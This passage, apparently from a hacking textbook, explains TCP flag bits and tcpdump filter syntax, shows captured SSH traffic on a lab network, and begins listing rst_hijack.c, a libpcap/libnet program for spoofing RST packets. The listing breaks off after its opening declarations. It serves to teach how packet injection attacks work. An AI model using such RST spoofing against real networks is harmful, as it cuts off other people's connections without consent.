Graphics Programs Reference
In-Depth Information
flags are found in the following order, from left to right: URG, ACK, PSH,
RST, SYN, and FIN. This means that if the ACK flag is turned on, the 13th
octet would be
00010000
in binary, which is 16 in decimal. If both SYN and
ACK are turned on, the 13th octet would be
00010010
in binary, which is 18
in decimal.
In order to create a filter that matches when the ACK flag is turned on
without caring about any of the other bits, the bitwise AND operator is used.
ANDing
00010010
with
00010000
will produce
00010000
, since the ACK bit is the
only bit where both bits are
1
. This means that a filter of
tcp[13] & 16 == 16
will match the packets where the ACK flag is turned on, regardless of the
state of the remaining flags.
This filter rule can be rewritten using named values and inverted logic as
tcp[tcpflags] & tcp-ack != 0
. This is easier to read but still provides the same
result. This rule can be combined with the previous destination IP rule using
and logic; the full rule is shown below.
reader@hacking:~/booksrc $ sudo tcpdump -nl "tcp[tcpflags] & tcp-ack != 0 and dst host
192.168.42.88"
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
10:19:47.567378 IP 192.168.42.72.40238 > 192.168.42.88.22: . ack 2777534975 win 92
<nop,nop,timestamp 85838571 0>
10:19:47.770276 IP 192.168.42.72.40238 > 192.168.42.88.22: . ack 22 win 92 <nop,nop,timestamp
85838621 29399>
10:19:47.770322 IP 192.168.42.72.40238 > 192.168.42.88.22: P 0:20(20) ack 22 win 92
<nop,nop,timestamp 85838621 29399>
10:19:47.771536 IP 192.168.42.72.40238 > 192.168.42.88.22: P 20:732(712) ack 766 win 115
<nop,nop,timestamp 85838622 29399>
10:19:47.918866 IP 192.168.42.72.40238 > 192.168.42.88.22: P 732:756(24) ack 766 win 115
<nop,nop,timestamp 85838659 29402>
A similar rule is used in the following program to filter the packets
libpcap sniffs. When the program gets a packet, the header information is
used to spoof a RST packet. This program will be explained as it's listed.
rst_hijack.c
#include <libnet.h>
#include <pcap.h>
#include "hacking.h"
void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *);
struct data_pass {
int libnet_handle;
u_char *packet;
};
int main(int argc, char *argv[]) {
struct pcap_pkthdr cap_header;
const u_char *packet, *pkt_data;
pcap_t *pcap_handle;
